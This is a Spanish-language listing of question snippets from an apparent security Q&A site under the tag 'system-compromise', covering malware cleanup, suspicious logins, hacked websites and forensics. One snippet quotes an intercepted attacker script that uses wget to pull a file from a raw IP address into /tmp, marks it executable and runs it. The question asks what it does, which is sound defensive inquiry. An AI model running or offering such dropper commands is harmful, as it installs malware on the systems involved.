Preguntas con etiqueta 'system-compromise'

10
respuestas

¿Cómo explica la necesidad de "atacar desde la órbita" a la administración y los usuarios?

Cuando una máquina ha sido infectada con malware, la mayoría de nosotros aquí identificamos de inmediato la acción apropiada como "atacar desde la órbita", es decir, borrar el sistema y comenzar de nuevo. Desafortunadamente, esto suele ser costo...
hecha 19.11.2012 - 14:59
10
respuestas

¿Debo preocuparme si el "FBI" ha iniciado sesión en mi Ubuntu VPS?

Ayer, estaba realizando un poco de mantenimiento general en un VPS mío, usando la consola IPMI que mi host proporcionó. Al configurar las claves SSH nuevamente a través de la consola IPMI, inicié sesión a través de SSH y me sorprendió al ver...
hecha 18.09.2016 - 16:38
8
respuestas

¿Cómo pueden Twitter y GitHub estar seguros de que no han sido pirateados?

Ayer, Twitter anunciado que recientemente identificó un error que almacenaba contraseñas no enmascaradas en un registro interno. Recientemente, Github también tuvo un error similar . En ambos casos, afirman que nadie tuvo acceso a estos archi...
hecha 04.05.2018 - 10:11
7
respuestas

¿Es posible que la persona que estaba sentada frente a mí en Starbucks intentara piratear mi computadora portátil?

Estaba usando mi computadora portátil en un Starbucks en una mesa, y una persona estaba usando una computadora portátil en la misma mesa frente a mí, un par de asientos a mi lado. Arrojó algo de plástico a través de la mesa hacia mi computadora...
hecha 15.12.2014 - 07:56
4
respuestas

¿Una versión pequeña de wget (51 bytes?)

En este artículo de ISC en DVR compromiso el autor habla sobre el compromiso de un sistema integrado. En particular, el atacante ejecuta una serie de comandos echo en el host remoto, y:    Este DVR no tiene la función "subir". No hay...
hecha 05.05.2014 - 16:20
7
respuestas

Una agencia gubernamental le envió a nuestro administrador del sitio web un correo electrónico informando que nuestro sitio web había sido borrado

Recibimos un correo electrónico oficial que decía que nuestro sitio web había sido hackeado. Citaron la URL que se usaría para ver el nuevo archivo sospechoso que se había caído en nuestra carpeta raíz web ( s.htm ). Solo un texto sobre un...
hecha 20.01.2017 - 20:36
1
respuesta

¿Debería considerarse comprometido un servidor simplemente porque el puerto estaba abierto?

Hoy mismo recibí una notificación de un incidente de seguridad en Mandrill . Al principio, me preocupé, pero luego, después de adentrarme en los detalles, me confundí en cuanto a por qué consideraban esto digno de mención. Para resumir, pare...
hecha 19.03.2015 - 02:12
3
respuestas

¿Qué hace esta secuencia de comandos sh si se ejecuta?

He interceptado un ataque en mi servidor web que creo que no tuvo éxito. El atacante intentó ejecutar este script: #!/bin/sh cd /tmp;cd /dev/shm wget -q http://221.132.37.26/xx -O ...x chmod +x ...x ./...x cd /dev/shm ; wget 221.132.37.26/ru...
hecha 15.03.2014 - 21:43
5
respuestas

Investigación forense: qué sistema operativo utilizar [cerrado]

Se me ha asignado una tarea de mi escuela, en la que se me ha dado una imagen virtual de un sistema comprometido. Lo primero que debo hacer es configurar un entorno en el que podamos montar la imagen. Necesito elegir un sistema operativo, y me p...
hecha 10.02.2014 - 13:11
5
respuestas

¿Cómo puedo agregar un archivo PHP una y otra vez a mi sitio pirateado?

Estoy en un plan de alojamiento compartido (lo sé, lo sé) en GoDaddy y todos los archivos que contiene han sido pirateados. Hay varios sitios en el plan, cada uno de ellos tiene una carpeta. Las carpetas y subcarpetas de cada sitio están llenas...
hecha 03.11.2016 - 20:35